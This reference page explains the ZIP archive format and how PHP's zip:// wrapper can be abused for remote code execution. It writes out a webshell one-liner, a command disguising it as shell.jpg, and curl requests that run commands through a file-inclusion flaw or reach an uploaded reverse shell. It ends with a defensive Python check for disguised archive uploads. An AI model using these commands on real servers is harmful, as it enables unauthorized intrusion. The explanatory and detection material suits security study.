ZIP
The ZIP file type is a widely used archive format designed to compress and bundle one or more files or directories into a single file for storage, distribution, or transport. It employs lossless compression algorithms, most commonly DEFLATE, to reduce file size without affecting the original content. A ZIP archive contains a central directory that lists the files, their metadata, and their compressed or uncompressed sizes, enabling efficient extraction and navigation of its contents.
ZIP files can store any type of data, including documents, images, executables, and even other archives, making them highly versatile. Many operating systems and applications provide native support for creating and extracting ZIP files, which contributes to their ubiquity. From a security perspective, ZIP archives can be abused to deliver malicious payloads, conceal executable code, or exploit vulnerabilities in archive parsing libraries. Password protection and encryption are supported, although implementations vary in strength, and weak encryption methods may be easily bypassed.
ZIP WRAPPER
The zip wrapper (not enabled by default) can lead to RCE when a webshell is archived into a zip file whose name ends in an allowed extension, e.g. .jpg. The files within the archive can be reached using #. This has a higher chance of working if ZIP uploads are allowed by the application, since content-type filters may otherwise block it.
# Create and archive a webshell (zip file = shell.jpg)
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Upload → RCE (URL-encode '#' -> %23)
curl "http://<ip:port>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id"
If ZIP uploads are allowed or the application stores the uploaded files in ZIP format, the shell can be uploaded directly and then accessed with or without the extension (depending on the code implementation):
$ curl --path-as-is "http://target-instance/index.php?file=zip://uploads/upload_1754572937.zip%23php-reverse-shell"
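A defensive counterpart to the uploads described above, as an added example that is not part of the original page: a Python upload check that flags ZIP content stored under an image extension and archive members with script extensions. The extension lists, function names and sample files are assumptions constructed for illustration.

```python
import io
import os
import zipfile

# Assumed policy for this example: extensions the upload form accepts as images,
# and member extensions a PHP server might execute.
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php5"}


def inspect_upload(filename, data):
    """Return a list of findings for one uploaded file (empty list = nothing flagged)."""
    findings = []
    buf = io.BytesIO(data)
    # is_zipfile() looks for the ZIP end-of-central-directory record,
    # so the verdict depends on content, not on the name or Content-Type.
    if not zipfile.is_zipfile(buf):
        return findings
    ext = os.path.splitext(filename)[1].lower()
    if ext in IMAGE_EXTS:
        findings.append(f"ZIP archive uploaded with image extension {ext}")
    try:
        with zipfile.ZipFile(buf) as zf:
            for member in zf.namelist():
                if os.path.splitext(member)[1].lower() in SCRIPT_EXTS:
                    findings.append(f"archive member with script extension: {member}")
    except zipfile.BadZipFile:
        findings.append("ZIP structure present but central directory is unreadable")
    return findings


def make_zip(members):
    """Build a constructed in-memory archive from {name: bytes} for the demo."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return out.getvalue()


# Constructed samples: placeholder bytes only.
DISGUISED = make_zip({"shell.php": b"placeholder"})
PLAIN_ARCHIVE = make_zip({"notes.txt": b"hello"})
JPEG_HEADER_ONLY = b"\xff\xd8\xff\xe0" + b"\x00" * 64

if __name__ == "__main__":
    for name, data in [("shell.jpg", DISGUISED), ("docs.zip", PLAIN_ARCHIVE),
                       ("photo.jpg", JPEG_HEADER_ONLY)]:
        print(name, inspect_upload(name, data))
```

Running the check at upload time, before the file is written under the web root, covers both cases on this page: the archive renamed to .jpg and the archive uploaded directly as .zip.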